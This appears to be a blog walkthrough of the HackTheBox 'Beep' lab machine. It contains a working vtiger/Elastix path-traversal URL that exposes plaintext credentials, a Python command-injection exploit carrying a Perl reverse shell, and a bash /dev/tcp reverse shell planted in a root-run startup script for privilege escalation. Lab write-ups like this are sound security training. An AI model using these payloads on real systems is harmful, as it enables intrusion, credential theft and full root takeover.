HackTheBox: Beep

The first step, as with all machines is to run an Nmap scan to identify the running services.

# Nmap 7.80 scan initiated Sun Aug 23 06:24:25 2020 as: nmap -oN scan -sV -O -p- -sC 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.033s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: RESP-CODES IMPLEMENTATION(Cyrus POP3 server v2) LOGIN-DELAY(0) PIPELINING AUTH-RESP-CODE USER STLS UIDL APOP EXPIRE(NEVER) TOP
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: CONDSTORE CATENATE ACL CHILDREN OK URLAUTHA0001 X-NETSCAPE LITERAL+ LIST-SUBSCRIBED LISTEXT IDLE MULTIAPPEND MAILBOX-REFERRALS QUOTA NAMESPACE UIDPLUS Completed ID ANNOTATEMORE THREAD=REFERENCES RIGHTS=kxte THREAD=ORDEREDSUBJECT SORT SORT=MODSEQ IMAP4 RENAME UNSELECT NO BINARY IMAP4rev1 ATOMIC STARTTLS
443/tcp   open  ssl/https?
|_ssl-date: 2020-08-23T10:30:15+00:00; +2m01s from scanner time.
878/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/23%OT=22%CT=1%CU=43276%PV=Y%DS=2%DC=I%G=Y%TM=5F42455
OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=CE%GCD=1%ISR=D1%TI=Z%CI=Z%II=I%TS=A)OPS(O
OS:1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11N
OS:W7%O6=M54DST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R
OS:=Y%DF=Y%T=40%W=16D0%O=M54DNNSNW7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M54DST11NW7%RD=0%
OS:Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%
OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%
OS:DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIP
OS:L=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Host script results:
|_clock-skew: 2m00s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 23 06:30:49 2020 -- 1 IP address (1 host up) scanned in 384.20 seconds

From here we can see there are numerous services running on the box. Most notable a SQL server, Mail server, and PBX. I started by browsing to port 80 and found that the Elastix server software was running. I attempted to log in with default credentials but this was unsuccessful.

I did some searching for exploits with Elastix. It’s difficult to tell from the login page which version of the software is running so much of this is trial and error. I found the LFI exploit HERE which allows you to view the amportal.conf configuration file. This file includes plain text credentials for the elastix web interface. It can be browsed to via the following link:

https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/amportal.conf%00&module=Accounts&action

Inside this file you have the following block of text, which includes the login credentials to login to the Elastix web interface.

AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE

FOPWEBROOT=/var/www/html/panel
#FOPPASSWORD=passw0rd
FOPPASSWORD=jEhdIekWmdjE

ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=jEhdIekWmdjE


vtigerCRM
adminL:jEhdIekWmdjE

Next I found THIS exploit which leverages the $to parameter in the callme_page.php page to provide remote code execution. By default, this code would not work due to certificate errors on the login page. It had to be modified slightly to rectify this, along with modifying the lhost and rhost values. I also had to reduce the minimum SSL version on my Kali machine by editing /etc/ssl/openssl.conf to accept TLSv1. I also needed to modify the extension number to match that on the Beep machine. This can be gathered by logging into the Elastix web interface, opening the PBX tab and finding the user name Fanis Papafanopoulos with the extension 233. The code for the exploit ultimately looked like the following:

import urllib
rhost="10.10.10.7"
lhost="10.10.14.29"
lport=443
extension="233"

# Reverse shell payload

url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urllib.urlopen(url)

I then started a netcat listener on port 443, ran the exploit and successfully received a shell on the listener. I upgraded the shell using python to something a bit more workable, then was able to browse to the fanis user and capture the user flag.

kali@kali:/etc/ssl$ sudo nc -lvp 443
listening on [any] 443 ...
10.10.10.7: inverse host lookup failed: Unknown host
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.7] 59571
python -c 'import pty; pty.spawn("/bin/bash")'
bash-3.2$ whoami
whoami
asterisk
bash-3.2$ cd /home
cd /home
bash-3.2$ ls
ls
fanis  spamfilter
bash-3.2$ cd fanis
cd fanis
bash-3.2$ ls
ls
user.txt
bash-3.2$ cat user.txt
cat user.txt
[REDACTED]
bash-3.2$ 

Next we have to escalate privileges to root. I ran “ps aux” to find which programs were currently running. The following program caught my eye as it was running as a root user, however the file belonged to and had write permissions for the asterisk user. This allows me to modify the file, then have it run as root to spawn a root reverse shell.

root      3571  0.0  0.1   4636  1168 ?        S    21:06   0:00 /bin/bash /etc/rc3.d/S91elastix-updaterd start

I started by modifying the file with the following reverse shell:

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.29/2600 0>&1

I then started a netcat listener on port 2600 on the kali machine:

kali@kali:~$ sudo nc -lvp 2600
listening on [any] 2600 ...

I then needed to find a way of starting that elastix-updaterd process. After some trial and error I found that restarting the system through the elastix interface caused the elastix-updaterd script to run as the root user.

Once this reboot completed, I was presented with a shell on my netcat listener. From here i identified it was a root shell, and was then able to cat the root flag.

kali@kali:~$ sudo nc -lvp 2600
listening on [any] 2600 ...



10.10.10.7: inverse host lookup failed: Unknown host
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.7] 47950
bash: no job control in this shell                                                                                   
bash-3.2# whoami                                                                                                  
root                                                                                                              
bash-3.2# cd /root                                                                                                
bash-3.2# ls
anaconda-ks.cfg
elastix-pr-2.2-1.i386.rpm
install.log
install.log.syslog
postnochroot
root.txt
webmin-1.570-1.noarch.rpm
bash-3.2# cat root.txt
[REDACTED]
bash-3.2# 

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *